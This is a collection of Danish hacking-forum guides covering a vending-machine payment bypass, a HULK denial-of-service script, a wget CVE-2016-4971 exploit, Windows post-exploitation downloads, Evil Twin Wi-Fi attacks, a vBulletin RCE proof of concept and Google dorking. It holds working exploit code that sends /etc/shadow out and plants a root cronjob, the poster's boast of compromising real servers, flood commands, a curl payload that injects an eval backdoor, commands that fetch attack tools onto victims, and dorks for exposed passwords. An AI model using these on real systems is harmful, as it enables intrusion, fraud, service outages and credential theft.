Shellsec - Vejledninger

[GRATIS] Hack en automat og få gratis mad/drikke

Wed, 16 May 2018 22:07:43 +0200

Davs igen... Så kom der en lille tutorial igen :)
Beskrivelse:
Med lidt hjerne og forståelse indenfor POST Requests, så kan du hacke dig frem til dit næste måltid.
Jeg anbefaler ikke at du gør dette, medmindre du er en som ejer sådan en her maskine, da det kan få store konsekvenser.

Denne tutorial er kun til educational purposes only (udelukkende til uddannelsesformål) og er blevet rapporteret og vil derfor højst sandsynligt blive fikset snarrest.

Hvad du skal bruge:

En Go!Vend Automat
En hjerne
En platform/program/addon til at fange/sende POST Requests (hvis du ikke ved hvordan man gør det, så behøver du ikke at læse videre)

Lad os begynde:

De har lavet deres API på denne "fantastiske" måde med, at du blot kan sende en request, som normalt bliver lavet, når du har overført et beløb til automaten. Denne request er åben og har ingen næsten ingen form for validering.

Først skal du fange requesten. Det går jeg ud fra at du ved hvordan man gør... (burp, fiddler... andet mitm program)

Nu kommer den sjove part! :D
Du skal nu blot gensende requesten som sørger for at maskinen ved at den har "modtaget" penge.

En request kan se sådan her ud:

Spoiler (Click to View)

I det øjeblik denne request vil blive sendt, vil maskinen automatisk tro at den har fået overført penge og du kan derfor ændre værdien, YY,som du har lyst til. Så hvis du ville have en ting til 17 kr., så kan du blot skrive 17 ind på YY's plads.

XXXXXXXXXXXXXXX er maskinens ID og kan findes ved at fange requesten eller blot finde en QR scanner og scanne QR koden.

ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ er det som gør at du skal ud til maskinen igen senere og fange en ny request, fordi den udløber efter x antal tid.

Det er som sagt allerede blevet sagt videre til virksomheden, Go!Vend, som er partnere med Arla.

- TheHacker, ude

[VEJLEDNING] DOS SCRIPT [HULK]

Thu, 09 Mar 2017 18:55:26 +0100

Hey, ville lige smide en lille guide op. ;)
* Det er ikke mig der har lavet scriptet.
Det du skal bruge:

Kali Linux
Hurtigt internet
Basis information omkring .go filer

Vejledning:

Citer:Du åbner dit Kali Linux
Skriver følgene:

apt-get install golang-go
git clone https://github.com/grafov/hulk.git
cd hulk
go run hulk.go --site http://0.0.0.0/ (Hjemmesiden her)

For python:
apt-get install python
python hulk.py http://0.0.0.0/ (Hjemmesiden her)

For proxy:

apt-get install proxychains
apt-get install tor
service tor restart
proxychains go run hulk.go --site http://0.0.0.0/ (Hjemmesiden her)
Eller:
proxychains python hulk.py http://0.0.0.0/ (Hjemmesiden her)

Så skulle det meget gerne virke.

Kort lille guide, håber i kunne bruge det. ;)

- sl4yer

Hack servere med wget!

Tue, 23 Aug 2016 15:11:55 +0200

CVE LINK: https://cve.mitre.org/cgi-bin/cvename.cg...-2016-4971

Jeg vil gerne introducere jer til et relativt nyt exploit som er fundet i wget 1.18 og gør at vi kan uploade arbitrary filer.
Dette exploit gør at vi med en kompromitteret webserver kan levere vores angreb. Med dette exploit kan du escalere root hvis wget køres via et root cronjob.

Angribern der skal kontrollerer serveren skal kunne få wget til at lave en arbitrary fil med arbitrary indhold og filnavn igennem et HTTP redirect som indeholder FTP serveren så man kan modtage svar fra victim-serveren.

For eksempel, hvis angriberen server svarer med følgende reaktion:

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: ftp://attackers-server/.bash_profile
Content-Length: 262
Server: Apache

wget vil automatisk følge omdirigering og vil hente en ondsindet
.bash_profile fil fra en ondsindet FTP-server.
Det vil undlade at omdøbe filen til det oprindeligt ønskede filnavn
»Safe_file.txt", som det normalt ville gøre, i tilfælde af en omdirigering til en anden
HTTP ressource med et andet navn.
Denne sårbarhed vil ikke fungere, hvis ekstra muligheder, der tvinger destination
filnavn angives som en parameter. Såsom: -O / tmp / output
Det er dog muligt at udnytte spørgsmålet med spejling / rekursive muligheder
aktiveret såsom -r eller -m.

En anden begrænsning er hvis vi udnytter denne sårbarhed kan vi kun
uploade vores ondsinde fil til den mappe hvorfra wget blev kørt,
eller til en mappe der angives af -P option (directory_prefix option).

Den aktuelle begrænsning kunne også omgås ved at uploade en .wgetrc
config fil.

For at kunne bruge exploitet skal du lave en FTP server og selv skrive din ondsindede version af .wgetrc
Har selv skaffet nogle roots over de 4 timer jeg testede ved at smide en backdoored shell op på et russisk forum.

# Wget 1.18 < Arbitrary File Upload Exploit

# Dawid Golunski

# CVE-2016-4971 



import SimpleHTTPServer

import SocketServer

import socket;



class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):

  def do_GET(self):

      # This takes care of sending .wgetrc



      print "We have a volunteer requesting " + self.path + " by GET :)\n"

      if "Wget" not in self.headers.getheader('User-Agent'):

 print "But it's not a Wget :( \n"

         self.send_response(200)

         self.end_headers()

         self.wfile.write("Nothing to see here...")

         return



      print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"

      self.send_response(301)

      new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )

      print "Sending redirect to %s \n"%(new_path)

      self.send_header('Location', new_path)

      self.end_headers()



  def do_POST(self):

      # In here we will receive extracted file and install a PoC cronjob



      print "We have a volunteer requesting " + self.path + " by POST :)\n"

      if "Wget" not in self.headers.getheader('User-Agent'):

 print "But it's not a Wget :( \n"

         self.send_response(200)

         self.end_headers()

         self.wfile.write("Nothing to see here...")

         return



      content_len = int(self.headers.getheader('content-length', 0))

      post_body = self.rfile.read(content_len)

      print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)



      print "Sending back a cronjob script as a thank-you for the file..." 

      print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"

      self.send_response(200)

      self.send_header('Content-type', 'text/plain')

      self.end_headers()

      self.wfile.write(ROOT_CRON)



      print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"



      return



HTTP_LISTEN_IP = '192.168.57.1'

HTTP_LISTEN_PORT = 80

FTP_HOST = '192.168.57.1'

FTP_PORT = 21



ROOT_CRON = "* * * * * root /usr/bin/id > /root/hacked-via-wget \n"



handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)



print "Ready? Is your FTP server running?"



sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

result = sock.connect_ex((FTP_HOST, FTP_PORT))

if result == 0:

  print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)

else:

  print "FTP is down :( Exiting."

  exit(1)



print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT



handler.serve_forever()

Windows postexpl. - Filedownload med BITSAdmin Tool

Sun, 24 Jan 2016 18:58:13 +0100

Mål:
Hvis man får adgang til en Linux shell, er det ofte rimelig trivielt at downloade yderligere værktøjer til maskinen. curl, wget, ftp, tftp osv., er ofte tilgængelige.
På windows er det en lidt anden sag.
Er man på en windows XP maskine, er der en god chance for, der f.eks. er en ftp klient, men nyere windows har ikke disse tools installeret som standard.
Ellers ender man ofte med at paste et Powershell, eller VBScript over i kommando prompten, for at kunne downloade filer. Ja, der er selvfølgelig andre måder at gøre det på. F.eks. kan man gøre det med Internet Explorer, men det er synligt for brugeren, der sidder ved maskinen.

Udfordring:
Ofte er den kommandoprompt man får, ikke rigtig interaktiv, hvis man f.eks. benytter Metasploit til at spawne den, så man kan ikke tale med en "ftp" prompt.
Skal man hente filer via ftp på en XP maskine, vil man skrive noget ala:

Citer:C:\Documents and Settings\test>ftp 10.0.2.11
Connected to 10.0.2.11.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 23:58. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
User (10.0.2.11:(none)): infosec
331 User infosec OK. Password required
Password:
230 OK. Current directory is /
ftp> bye
221-Goodbye. You uploaded 0 and downloaded 0 kbytes.
221 Logout.

C:\Documents and Settings\test>

Men her kommer problemet med at kommandoprompten ofte, ikke er rigtig interaktiv, så man når aldrig at udstede en GET kommando. Som jeg så har misset oven over, kan jeg se!
Du får lov at give brugernavnet, men når FTP serveren beder om en kode, hænger det hele.
Heldigvis har ftp klienten til Windows en -s switch, som gør, vi kan angive en fil, som agerer input for os.
Så hvis man paster følgende ind i kommandoprompten, får man en ftpcmd.txt fil, som ftp så bliver aktieret med:

Citer:echo open 10.0.2.11>ftpcmd.txt
echo infosec>>ftpcmd.txt
echo SomePassword>>ftpcmd.txt
echo bin>>ftpcmd.txt
echo GET plink.exe>>ftpcmd.txt
echo bye>>ftpcmd.txt
ftp -s:ftpcmd.txt
del ftpcmd.txt

Ovenstående åbner en FTP forbindelse til 10.0.2.11 med brugeren infosec og koden SomePassword.
Der efter henter den filen plink.exe fra FTP serveren og sletter ftpcmd.txt filen.
Man kan overveje om man vil smide /F eller /Q på "del" kommandoen i scriptet.
Så man kan rette tingene til, som man synes.
Kig lidt på ovenstående og læg mærke til "echo" kommandoerne og output redirection med ">" og ">>".

Filen ftpcmd.txt vil se ud som her:

Citer:open 10.0.2.11
infosec
SomePassword
bin
GET plink.exe
bye

Filen vil blive eksekveret af "ftp -s:ftpcmd.txt" og efterfølgende slettet af "del ftpcmd.txt", de to sidste kommandoer i vores paste.
Man kan gøre som ovenstående med andre scripts og få det samme ud af det.

Problemet:
Måske er der ikke åben på port 21 i firewall egress regler, eller måske er FTP klienten ikke installeret, eller hvad det nu måtte være.

Løsning:
Jeg skal ikke bruge ordet alle, men som i ved, så har lagt de fleste maskiner adgang til Internettet på port 80.
Som nævnt tidligere, kan man snilt finde et script på nettet, der kan gøre det, og jeg har selv gjort det sådan i lang tid. Jeg faldt så over BITSAdmin Tool, som er bygget ind i windows. Det er deprecated, men det findes, selv i Windows 10, og virker fint.

Jeg vil ikke skrive så meget om, værktøjet i sig selv, da jeg har posted et link til Microsoft, hvor det er beskrevet.
Jeg vil dog nævne, det virker ved, man laver et "job", som i kan se her under, hvor jeg downloader sbd.exe filen:

Citer:C:\Users\John Doe\tmp>dir | find "sbd.exe"

C:\Users\John Doe\tmp>bitsadmin /create /download SomeJob

BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Created job {3C523925-381F-468D-BB7C-78049B35F9F3}.

C:\Users\John Doe\tmp>bitsadmin /addfile SomeJob "http://10.0.2.11/sbd.exe" "C:\Users\John Doe\tmp\sbd.exe"
...crop...
Added http://10.0.2.11/sbd.exe -> C:\Users\John Doe\tmp\sbd.exe to job.

C:\Users\John Doe\tmp>bitsadmin /list
...crop...
{3C523925-381F-468D-BB7C-78049B35F9F3} 'SomeJob' SUSPENDED 0 / 1 0 / UNKNOWN
Listed 1 job(s).

C:\Users\John Doe\tmp>bitsadmin /resume SomeJob
...crop...
Job resumed.

C:\Users\John Doe\tmp>bitsadmin /list
...crop...
{3C523925-381F-468D-BB7C-78049B35F9F3} 'SomeJob' TRANSFERRED 1 / 1 50176 / 50176
Listed 1 job(s).

C:\Users\John Doe\tmp>bitsadmin /complete SomeJob
...crop...
Job completed.

C:\Users\John Doe\tmp>dir | find "sbd.exe"
11-10-2015 00:57 50.176 sbd.exe

C:\Users\John Doe\tmp>

Man skal selvfølgelig have en server, at hente filerne fra.
Om man starter en minimalistisk webserver med "python -m SimpleHTTPServer 80", eller bruger en full blown webserver, burde ikke gøre nogen forskel. Jeg brugte Apache2.
En ting man skal være opmærksom på, er at filen ikke ligger i destinationsfolderen før man completer jobbet.

Så fremgangsmåden er:
1) Lav et job med "bitsadmin /create"
2) Tilføj en fil til jobbet med "bitsadmin /addfile"
3) Sæt jobbet i gang med "bitsadmin /resume"
- Disse jobs er i suspended mode, når de er lavet. Så man kan smide filere filer i, inden det kører.
4) Når downloaden er færdig, sættes jobbet completed med "bitsadmin /complete"

"SomeJob" er jobbets navn, og er tilfældigt valgt. Man kan have flere jobs kørende på een gang. Man kan godt bruge samme navn til flere jobs, men så kan man ikke længere bruge jobnavnet, men i stedet "{3C523925-381F-468D-BB7C-78049B35F9F3}", i dette tilfælde.
Kommandoen "bitsadmin /list", viser en liste over jobs.
En anden kommando, der kan være interessant, er "bitsadmin /monitor", da den viser hvor langt, jobbet er kommet. Men den opdaterer sig selv og skal afbrydes med CTRL^C, så den er ikke så praktisk i en kommandoprompt. Slet ikke, hvis man kun har en enkelt prompt. Så er det bedre at benytte sig af outputtet fra "bitsadmin /list", for at se, om filen er hentet.

Skal man kun overføre en enkelt fil, kan det nok gøres med:

Citer:C:\Users\test>bitsadmin.exe /transfer SomeJob "http://10.0.2.11/sbd.exe" "C:\Users\John Doe\sbd.exe"

Gåseøjne er kun nødvendig, hvis man har et eller flere mellemrum, et sted i sti/fil navnet.

Mere:
En af de ting, jeg synes der er smart ved BITSAdmin Tool, er at man kan adde flere filer til et job. Man kan bare gentage "bitsadmin /addfile" kommandoen.
Det er også asynkront, så det blokerer ikke din prompt, mens man venter, i tilfælde af, det er en stor fil man downloader.

Man kan gøre det på flere måder med PowerShell, men nogle af dem er versionsafhængig.
Her er et eksempel:

Citer:$client = new-object System.Net.WebClient
$client.DownloadFile( "http://10.0.2.11/", "sbd.exe" )

Her er et VBScript eksempel:

Citer:dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://10.0.2.11/sbd.exe", False
xHttp.Send

with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile "c:\Users\test\sbd.exe", 2 '//overwrite
end with

Ovenstående gemmes f.eks. i "get.vbs" og startes med "c:\>cscript get.vbs".
Begge eksempler er respektløst stjålet fra nettet.

VBScripts skal køres fra en fil, så det letteste er nok at gøre som med FTP scriptet, og paste det ind i kommando prompten.
Altså bruge "echo" og pipe indholdet ud i en fil med ">" eller ">>". Jeg bruger altid ">" på den første linie, så jeg overskriver den lokale fil, hvis jeg paster igen, og så ">>" på resten.
Det er meget rart, hvis man får lavet en fejl.

Links:
BITSAdmin Tool - MSDN
VBS Download
PowerShell Download

Ja, det er rigtigt. Den har været i VIP sektionen, men jeg har brugt tid på at skrive den, så kan det være nogen her kan bruge den. :)

Wi-Fi Pentesting - Evil Twin Attack

Wed, 26 Aug 2015 00:49:14 +0200

Jeg havde lige denne her guide liggende omkring et simpelt Evil Twin angreb.

Hvad er et Evil Twin angreb?

Evil Twin (Ond tvilling) er et Wi-Fi Access point som ser ud til at være et legitimt Access Point, men faktisk er oprettet for at aflytte trådløs kommunikation. Denne form for angreb minder meget om phishing, bare på trådløs version. Fordi her vil angriberen udgive sig for at være en legitim udbyder og dermed narre de trådløse brugere til at forbinde sig til angriberens bærbar, smartphone eller andet.

Hvordan udføres et Evil Twin angreb?

Der er flere måder på at gøre det både mht. kreativitet og raffinement.
Fyr op for airmon-ng værktøjet og start med at sniffe trafikken rundt omkring dig i luften. Sørg for at have et netkort der kan indstilles til monitor mode via airmon-ng.

For at sniffe rundt omkring dig bruger du kommandoen:

- airodump-ng mon0

Herfra vil du se Access Points rundt omkring dig. Du vælger hermed den valgte Access Point, du ønsker at klone dig med. Dette kan du gøre ved at opsætte et falsk Access Point via airbase-ng:

- airbase-ng -a --essid "Her skriver du SSID’en af den valgte Access Point" -c (her vælger du den specifikke kanal access pointen opererer under) mon0

Nu har vi opsat en falsk Access Point, der skulle forestille sig at være en smule identisk med offerets Access Point.

Det vi ønsker er, at på en eller anden måde tvinge offerets maskine til at bryde sin forbindelse og dermed få maskinen til at forbinde sig til vores falske Access Point, i stedet for den rigtige. Det kan så gøres med forskellige teknikker. En af dem er, at vi aktivt bryder forbindelsen mellem den legitimerede klient (som er vores offer) og den legitimerede Access Point via deauthentications pakker vha. aireplay-ng:

- aireplay-ng –deauth 0 –a (“BSSID’en af den valgte Access Point”)

Her kommer så det afgørende og vigtige led: Hvis vores falske Access Points signal er stærkere, vil offerets maskine automatisk genoprette forbindelse til vores falske AP.

Når forbindelsen er etableret, har du en masse muligheder. Man-In-The-Middle attacks, SSL Man-in-the-middle attacks, Social Engineering Toolkit, Metasploit, Nmap osv.

Svaghed ved denne angrebsform?

Vi skal sørge for, at vores falske AP er tættere eller stærkere end den oprindelige AP. Dette kunne være en kritisk svaghed, når fysisk adgang ikke er tilgængelig. I coffeeshops, lufthavne og andre offentlige steder som bruger open authentication er det ikke det store problem. Men har vi ikke fysisk adgang har offerets oprindelige AP højst sandsynligt et tættere og stærkere signal end vores falske kan tilbyde. Evt. kunne man tune op for styrken af sit netkort. :)

Skole blokker programmer

Thu, 20 Aug 2015 14:40:32 +0200

Hey alle. Jeg har et program jeg gerne vil køre på min computer når jeg sidder på min skole. Men så længe jeg er på deres net så får det ikke adgang til at komme online. Hvordan kan jeg komme udenom den block og sørge for at det kan komme online?

vBulletin < 4.2.2 rce "0day" (source: fd)

Tue, 18 Aug 2015 21:38:12 +0200

Source: http://seclists.org/fulldisclosure/2015/Aug/58

Denne er ikke ny, men jeg kendte personlig ikke til den før jeg læste den på FullDisclosure:

Status: Fixed in some versions.

Citer:Remote Upload allows to send arbitrary data to loopback-only services, possibly allowing the execution of arbitrary code Exists in vB4. The remote upload as implemented by the vB_Upload_* classes and vB_vURL (at least in vB 4.2.x, most probably earlier releases are also affected, and vB 5 might be affected as well) does not restrict the destination ports and hosts for remote uploads. This allows an attacker to abuse the function to as a proxy commit TCP port scans on other hosts. Much worse, it also allows to connect to local loopback-only services or to services only exposed on an internal network.

On a setup running e.g. Memcached in default configuration (bound to localhost:11211, no authentication), the latter can be exploited to execute arbitrary code by forging a request to memcached, updating the `pluginlist` value.

Proof-of-Concept using cURL:

Kode:
$ curl 'http://sandbox.example.com/vb42/profile.php?do=updateprofilepic' -H 'Cookie: bb_userid=2; bb_password=926944640049f505370a38250f22ae57' --data 'do=updateprofilepic&securitytoken=1384776835-db8ce45ef28d8e2fcc1796b012f0c9ca1cf49e38&avatarurl=http://localhost:11211/%0D%0Aset%20pluginlist%200%200%2096%0D%0Aa%3A1%3A%7Bs%3A12%3A%22global_start%22%3Bs%3A62%3A%22if%28isset%28%24_REQUEST%5B%27eval%27%5D%29%29%7Beval%28%24_REQUEST%5B%27eval%27%5D%29%3Bdie%28%29%3B%7D%0D%0A%22%3B%7D%0D%0Aquit%0D%0A.png'

This leads to vBulletin opening a connection to the Memcached (localhost:11211) and sending the following data:

Kode:
HEAD / set pluginlist 0 0 96 a:1:{s:12:"global_start";s:62:"if(isset($_REQUEST['eval'])){eval($_REQUEST['eval']);die();} ";} quit .png HTTP/1.0 Host: localhost User-Agent: vBulletin via PHP Connection: close

This will cause the Memcached to update the `pluginlist` to contain the malicious code.

GENIALT!

MLT's guide - NTLM relaying methods

Tue, 07 Jul 2015 20:40:11 +0200

Der er flere forskellige teknikker over, hvordan man kan få adgang til en maskine på administrator-niveau.

Pass-the-hash, Pass-the-Kerberos mv. er ret populære teknikker. Sagen er den, at pass-the-hash fx kræver, at man allerede har administrator rettigheder lokalt før man kan benytte sig af denne metode.

Nedenfor har jeg så delt et link som handler om en mere upopulær teknik der demonstrerer via teori og teknik, hvordan man kan få admin rettigheder via en almindelig user eller såfremt en guest user. MLT, som er selve nicknamet af personen der har researchet omkring dette emne, mener, at angrebet kan udføres både remotely og lokalt. De fleste windows versioner er ramte inklusiv windows 8.1 og windows 2012

Teknikken hedder NTLM relaying.

Al credits går til ham :).

https://1mlt.wordpress.com/2014/11/03/br...g-methods/

Guide til google dorking

Wed, 24 Jun 2015 20:57:54 +0200

Hvad er google dorking?

Google dorking er ganske enkelt, at man bruger specifikke søgninger via google til eksempelvis at identificere sårbarheder på nettet, samle informationer mod sit mål, eller finde offentligt tilgængelige filer, der ikke bevist skal være tilgængelige (eksempelvis backup, sql dumps, konfigurationsfiler o.l). I denne guide vil jeg give en hurtig introduktion til simpel, men effektiv google dorking på begyndervenligt niveau med en række eksempler til at vise, hvor effektivt google dorking kan være.
Det positive ved google dorking er, hvor nemt og effektivt det kan være til at finde sårbarheder, mens det negative er, at det er så kendt en metode, at de fleste sårbarheder typisk er blevet fundet af andre før, og samtidig dækker det kun over, hvad google har indekseret, som langt fra er alt.

Google search operators

Google search operators er "parametre", du kan bruge til at gøre din søgning på google mere effektiv. Du kan læse mere om dem og deres forskellige funktioner på http://www.googleguide.com/advanced_oper...rence.html

De operators, der er mest effektive til google dorking er typisk:

inurl: specificerer, hvad der skal stå i url bar på de resultater, du søger efter.
Eksempel: inurl:wp-admin <--- eksempel på wordpress-dorking, hvor man bruger inurl til at søge efter wordpress-sider, hvis admin-login er indekseret hos google

site: specificerer domænet/domænetyper der skal fokuseres på i søgninger.
Eksempel: site:dk <--- sørger for, at alle søgninger kun er .dk domæner
Eksempel: site:eb.dk <--- specificerer eb.dk som det eneste domæne, du ønsker resultater fra - dette kan være praktisk at gøre til målrettet dorking

intext: specificerer, hvad der skal stå i sidens tekst
Eksempel: intext:"you have an error in your sql syntax" <--- eksempel på, hvordan man hurtigt kan finde sider med sql injection sårbarheder

intitle: specificerer, hvad der skal stå i titel på hjemmesiden
Eksempel: intitle:index of /weekly cpbackup <--- eksempel på dorking efter cpanel backups (lånt fra ghdb)

ext: specificerer file extension på siden
eksempel: ext:php <--- viser kun resultater der er kodet i php

Disse eksempler er ret simple og knapt så interressante, medmindre man tilføjer lidt mere til dem, som gør dem mere praktiske, som vi nu kommer ind på.

Eksempler på dorking:

dorking efter kritiske filer:

Der er desværre for mange programmører, der lader backups, sql dumps osv. ligge offentligt tilgængeligt på deres webservere uden at tænke over konsekvenserne. Den slags kan man hurtigt finde nogle gode eksempler på med denne dork:
inurl:backup ext:sql -github - her kan man evt. også specificere lande, hvor Danmark også har eksempler på dette. Eksempel: inurl:backup ext:sql site:dk og ext:sql site:dk - den kan tweakes en del alt efter, hvad man naturligvis leder efter

Andre eksempler:filer:

ext:conf intext:password intext:admin -google -github <--- denne dork giver 2470 eksempler på sider, hvor der er konfigurationsfiler med admin og password i teksten på konfigurationsfilerne. Her skrives der -google og -github for at reducere en stor del af resultaterne fra google code og github, da de ikke er brugbare

ext:ini intext:password intext:admin -google -github <--- samme koncept som ovenstående, bare .ini frem for .conf

Dette er som sagt kun eksempler, og der er masser af andre metoder til lignende resultater - prøv jer frem, og I vil hurtigt blive overraskede over, hvor meget man kan finde på ingen tid!

subdomæne enumeration:

Når man skal lave en penetration testing, skal man bruge en del tid på at analysere sit mål og finde forskellige vectors, hvor subdomæner er yderst relevante. For at identificere forskellige subdomæner, prøver vi som vores eksempel at dorke lidt på ebay.com, som har en stor del. Nogle programmeringssprog er kendte for dårlig sikkerhed, deriblandt coldfusion med subzero-exploitet og cgi med shellshock. Begge sårbarhederne er ret forældede og virker ikke så tit, men de er gode eksempler til, hvad vi vil prøve. I vores eksempel prøver vi at finde subdomæner og specificerer efter domæner, der kører coldfusion

Vores første dork bliver site:*.ebay.com -www. Dette giver os alle søgeresultater på ebays subdomæner, som google kan finde på nær dem med www i og ebay.com i sig selv, hvor der dukker 12.000.000 resultater op. Hvis vi ændrer vores dork til site*.ebay.com ext:cfm bliver resultatet dog mere overskueligt. Vores første domæne vi ser i søgning er investor.ebay.com, som kører coldfusion. Derefter kan vi ændre dork til site*.ebay.com ext:cfm -investor for at få alle ebays domæner med coldfusion, som ikke er investor.ebay.com (da vi allerede kender den). Sådan kan man fortsætte igennem, til man har alle domæner med coldfusion, hvoefter man kan prøve andre file extensions (php, asp, aspx, jsp, cgi, do for at komme med nogle eksempler). Dette er ikke "hacking" i sig selv, men er en effektiv måde til at finde interressante subdomæner, som man bagefter kan finde sårbarheder på.

Dorking efter sårbarheder:

Til sidst vil jeg give nogle gode eksempler på, hvordan man kan finde sider, der har typiske sårbarheder som sql injection. Der findes flere fejlkoder til oracle sql server, msaccess, pgsql osv. men tager kun mysql og mssql som eksempel i de to første, og .dk kan selvfølgelig skiftes ud med en masse andet, eksempelvis .gov

site:dk intext:"you have an error in your sql syntax" -eksperten.dk
site:dk intext:"microsoft ole db provider for" -eksperten.dk

inurl:index.php?page=*.php intext:"failed to open stream" -forum <--- eksempel på, hvordan man hurtigt kan finde nogle lfi/rfi-sårbarheder. At siderne giver fejlkoder betyder ikke nødvendigvis, at de er sårbare, men man kan hurtigt finde nogle sårbare sider, hvis man bare lige prøver sig frem. page kan hedde noget andet som eksempelvis site,inc,path og andet og *.php kan være *.htm, *.html, *.txt osv

Mere magter jeg ikke lige at tilføje til guiden indtil videre, da google dorking som sagt er et ret stort emne, som dækker bredt. Hvis folk vil have flere effektive eksempler på google dorking, kan jeg klart anbefale at lurke lidt på https://www.exploit-db.com/google-hacking-database/. Jeg håber, at dette var brugbart for nogen :)

Disclaimer: Jeg tager (naturligvis) ikke ansvar for, hvad andre folk bruger info i denne guide til.

netsh - Microsoft Net Shell - Intro

Mon, 25 May 2015 18:36:05 +0200

Denne intro er mere en teaser, som skal hjælpe med at komme i gang med netsh. Det er mest en "where-to-start", da jeg ikke giver ret mange eksempler.
Det skyldes primært, at man kan se alle kommandoerne med "?", direkte i netsh.
Så det ville være lidt overflødigt at skrive dem alle. Der er selvfølgelig også en masse info tilgængelig på nettet.
Det er et super værktøj, både til administration, og selvfølgelig som hacker.

Eksempler:
Man kan f.eks. se, hvilke adresser maskinens interfaces har:

Citer:C:\Windows\System32>netsh int ipv4 show addresses

Konfiguration for grænseflade "LAN-forbindelse"
DHCP aktiveret: Ja
IP-adresse: 10.0.2.43
Undernetpræfiks: 10.0.2.0/23 (maske 255.255.254.0)
Standardgateway: 10.0.2.1
Gatewaymetrikværdi: 0
InterfaceMetric: 10

Konfiguration for grænseflade "Trådløs netværksforbindelse"
DHCP aktiveret: Ja
InterfaceMetric: 25

Konfiguration for grænseflade "VirtualBox Host-Only Network"
DHCP aktiveret: Nej
IP-adresse: 192.168.56.1
Undernetpræfiks: 192.168.56.0/24 (maske 255.255.255.0)
InterfaceMetric: 20

Konfiguration for grænseflade "Loopback Pseudo-Interface 1"
DHCP aktiveret: Nej
IP-adresse: 127.0.0.1
Undernetpræfiks: 127.0.0.0/8 (maske 255.0.0.0)
InterfaceMetric: 50

C:\Windows\System32>

Bemærk at "int" er en forkortelse for "interface", og disse keywords kan forkortes temmelig meget.
Nedenstående to kommandoer giver det samme resultat:

Citer:netsh interface show interface
netsh i s i

Kan kan også få en oversigt over sine interfaces, hvis man har brug for det:

Citer:C:\Windows\System32>netsh int ipv4 show interfaces

Idx Met MTU Tilstand Navn
--- ---------- ---------- ------------ ---------------------------
1 50 4294967295 connected Loopback Pseudo-Interface 1
11 25 1300 disconnected Trådløs netværksforbindelse
12 10 1300 connected LAN-forbindelse
20 20 1500 connected VirtualBox Host-Only Network

C:\Windows\System32>

Det gælder selvfølgelig både for IPv4 og IPv6.

Man kan også bruge "add" til at tilføje, "set" til at ændre, og "del" for at slette instillinger. F.eks. kan man slette en IP adresse.

Citer:netsh int ipv4 set address "Local Area Connection" static 192.168.1.3 255.255.255.0 192.168.1.1
netsh int ipv4 del address "Local Area Connection" 192.168.1.3 192.168.1.1
netsh int ipv4 add address "Local Area Connection" 192.168.1.4

Man kan også se sine windows firewall instillinger:

Citer:C:\Windows\System32>netsh advfirewall show allprofiles

Domæneprofil-indstillinger:
----------------------------------------------------------------------
Tilstand TIL
Firewall-politik BlockInbound,AllowOutbound
LocalFirewallRules I/T (kun gruppepolitikobjekt-lager)
LocalConSecRules I/T (kun gruppepolitikobjekt-lager)
InboundUserNotification Aktiver
RemoteManagement Deaktiver
UnicastResponseToMulticast Aktiver

Logføring:
LogAllowedConnections Deaktiver
LogDroppedConnections Deaktiver
FileName %systemroot%\system32\LogFiles\Firewall\pfirewall.log
MaxFileSize 4096

Privat profil-indstillinger:
----------------------------------------------------------------------
Tilstand TIL
Firewall-politik BlockInbound,AllowOutbound
...

Windows firewall kan disables med:

Citer:netSh advfirewall set allprofiles state off

Eller aktiveres med:

Citer:netSh advfirewall set allprofiles state on

Mere:
Hvad kan man ellers og hvordan finder man selv ud af, hvad man kan?
For at se hvad man ellers kan i denne context, kan man udføre følgende:

Citer:C:\Windows\System32>netsh int ipv4 show ?

Følgende kommandoer er tilgængelige:

Kommandoer i denne kontekst:
show addresses - Viser IP-adressekonfigurationer.
show compartments - Viser opdelingsparametre.
show config - Viser IP-adresser og flere oplysninger.
show destinationcache - Viser poster i destinationscachen.
show dnsservers - Viser DNS-serveradresserne.
show dynamicportrange - Viser konfigurationsparametre for dynamisk portinterval.
show global - Viser globale konfigurationsparametre.
show icmpstats - Viser ICMP-statistik.
show interfaces - Viser grænsefladeparametre.
show ipaddresses - Viser de aktuelle IP-adresser.
show ipnettomedia - Viser IP net-til-medieforbindelser.
show ipstats - Viser IP-statistik.
show joins - Viser tilsluttede multicast-grupper.
show neighbors - Viser poster i den tilstødende cache.
show offload - Viser oplysninger om aflastning.
show route - Viser poster i rutetabellen.
show subinterfaces - Viser undergrænsefladeparametre.
show tcpconnections - Viser TCP-forbindelser.
show tcpstats - Viser TCP-statistik.
show udpconnections - Viser UDP-forbindelser.
show udpstats - Viser UDP-statistik.
show winsservers - Viser WINS-serverens adresser.

C:\Windows\System32>

Man kan rigtig meget med dette tool og det har sin egen shell. Her kan man se alle muligheder.
Den er context baseret, lidt som Cisco IOS, eller harddiskens mappestruktur.

Vi kan prøve at se på følgende kommando:

Citer:netsh interface show interface

Vi går fra netsh "rod" context, til "interface" context:

Citer:C:\Windows\System32>netsh
netsh>interface
netsh interface>show

Følgende kommandoer er tilgængelige:

Arvede kommandoer fra konteksten netsh:
show alias - Viser alle definerede aliaser.
